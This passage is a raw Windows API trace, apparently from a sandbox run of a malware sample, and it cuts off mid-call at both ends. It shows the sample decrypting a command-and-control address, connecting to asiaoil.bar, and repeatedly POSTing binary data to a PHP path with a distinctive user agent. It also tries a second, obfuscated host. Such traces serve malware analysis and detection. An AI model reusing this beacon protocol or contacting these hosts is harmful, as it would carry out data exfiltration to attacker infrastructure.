phProv=0x19fca8*=0x75d210) returned 1 [0308.207] GetProcessHeap () returned 0x740000 [0308.207] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0308.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.208] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0308.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.209] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.210] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.210] GetProcessHeap () returned 0x740000 [0308.211] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0308.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.212] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0308.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.214] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0308.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.215] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0308.215] GetProcessHeap () returned 0x740000 [0308.215] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0308.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.216] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0308.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.217] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0308.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.218] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0308.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.219] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0308.219] GetProcessHeap () returned 0x740000 [0308.219] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0308.219] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0308.521] GetProcessHeap () returned 0x740000 [0308.521] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0308.521] socket (af=2, type=1, protocol=6) returned 0x2dc [0308.521] connect (s=0x2dc, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0308.664] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0308.664] GetProcessHeap () returned 0x740000 [0308.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0308.665] GetProcessHeap () returned 0x740000 [0308.665] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0308.665] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0308.666] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0308.667] GetProcessHeap () returned 0x740000 [0308.667] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0308.667] GetProcessHeap () returned 0x740000 [0308.667] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0308.667] GetProcessHeap () returned 0x740000 [0308.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0308.668] GetProcessHeap () returned 0x740000 [0308.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0308.669] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0308.670] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0308.670] GetProcessHeap () returned 0x740000 [0308.670] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0308.670] GetProcessHeap () returned 0x740000 [0308.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0308.670] send (s=0x2dc, buf=0x747928*, len=243, flags=0) returned 243 [0308.671] send (s=0x2dc, buf=0x761fd0*, len=159, flags=0) returned 159 [0308.671] GetProcessHeap () returned 0x740000 [0308.671] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0308.671] recv (in: s=0x2dc, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0308.772] GetProcessHeap () returned 0x740000 [0308.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0308.773] GetProcessHeap () returned 0x740000 [0308.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0308.774] GetProcessHeap () returned 0x740000 [0308.774] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0308.774] GetProcessHeap () returned 0x740000 [0308.774] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0308.774] closesocket (s=0x2dc) returned 0 [0308.775] GetProcessHeap () returned 0x740000 [0308.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0308.775] GetProcessHeap () returned 0x740000 [0308.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0308.775] GetProcessHeap () returned 0x740000 [0308.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0308.775] GetProcessHeap () returned 0x740000 [0308.776] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0308.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1100) returned 0x2dc [0308.777] Sleep (dwMilliseconds=0xea60) [0308.779] GetProcessHeap () returned 0x740000 [0308.779] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0308.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.780] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0308.793] GetProcessHeap () returned 0x740000 [0308.793] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0308.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.794] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0308.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.795] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.796] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.796] GetProcessHeap () returned 0x740000 [0308.797] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0308.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.798] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0308.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.799] CryptDestroyKey (hKey=0x74d368) returned 1 [0308.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.800] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0308.800] GetProcessHeap () returned 0x740000 [0308.800] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0308.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.801] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.802] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.802] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.803] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.803] GetProcessHeap () returned 0x740000 [0308.803] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0308.803] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0308.804] GetProcessHeap () returned 0x740000 [0308.804] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0308.804] GetProcessHeap () returned 0x740000 [0308.805] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0308.805] GetProcessHeap () returned 0x740000 [0308.805] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0308.805] GetProcessHeap () returned 0x740000 [0308.805] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0308.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.829] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.834] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0308.840] GetProcessHeap () returned 0x740000 [0308.840] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0308.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.841] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0308.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.842] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.843] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.843] GetProcessHeap () returned 0x740000 [0308.844] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0308.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.845] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0308.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.846] CryptDestroyKey (hKey=0x74d368) returned 1 [0308.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0308.846] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0308.846] GetProcessHeap () returned 0x740000 [0308.846] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0308.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.847] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0308.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.849] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0308.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.849] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0308.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0308.850] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0308.850] GetProcessHeap () returned 0x740000 [0308.851] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0308.851] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0308.852] GetProcessHeap () returned 0x740000 [0308.852] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0308.852] socket (af=2, type=1, protocol=6) returned 0x2e0 [0308.852] connect (s=0x2e0, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0308.879] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0308.879] GetProcessHeap () returned 0x740000 [0308.879] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0308.879] GetProcessHeap () returned 0x740000 [0308.879] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0308.880] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0308.881] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0308.881] GetProcessHeap () returned 0x740000 [0308.882] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0308.882] GetProcessHeap () returned 0x740000 [0308.882] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0308.883] GetProcessHeap () returned 0x740000 [0308.883] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0308.883] GetProcessHeap () returned 0x740000 [0308.883] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0308.883] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0308.884] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0308.885] GetProcessHeap () returned 0x740000 [0308.885] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0308.885] GetProcessHeap () returned 0x740000 [0308.885] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0308.885] send (s=0x2e0, buf=0x747928*, len=243, flags=0) returned 243 [0308.886] send (s=0x2e0, buf=0x761fd0*, len=159, flags=0) returned 159 [0308.886] GetProcessHeap () returned 0x740000 [0308.886] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0308.886] recv (in: s=0x2e0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0309.003] GetProcessHeap () returned 0x740000 [0309.003] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0309.004] GetProcessHeap () returned 0x740000 [0309.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0309.005] GetProcessHeap () returned 0x740000 [0309.005] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0309.005] GetProcessHeap () returned 0x740000 [0309.005] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0309.005] closesocket (s=0x2e0) returned 0 [0309.006] GetProcessHeap () returned 0x740000 [0309.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0309.006] GetProcessHeap () returned 0x740000 [0309.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0309.006] GetProcessHeap () returned 0x740000 [0309.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0309.006] GetProcessHeap () returned 0x740000 [0309.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0309.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10bc) returned 0x2e0 [0309.010] Sleep (dwMilliseconds=0xea60) [0309.012] GetProcessHeap () returned 0x740000 [0309.012] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0309.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0309.356] GetProcessHeap () returned 0x740000 [0309.356] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0309.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.358] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0309.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.359] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.361] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.361] GetProcessHeap () returned 0x740000 [0309.361] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0309.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.362] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0309.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.364] CryptDestroyKey (hKey=0x74d768) returned 1 [0309.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.365] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0309.365] GetProcessHeap () returned 0x740000 [0309.365] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0309.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.367] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.368] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.369] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.370] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.370] GetProcessHeap () returned 0x740000 [0309.370] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0309.370] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.371] GetProcessHeap () returned 0x740000 [0309.371] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0309.371] GetProcessHeap () returned 0x740000 [0309.371] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0309.371] GetProcessHeap () returned 0x740000 [0309.372] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0309.372] GetProcessHeap () returned 0x740000 [0309.372] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0309.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0309.389] GetProcessHeap () returned 0x740000 [0309.389] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0309.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.391] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0309.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.392] CryptSetKeyParam 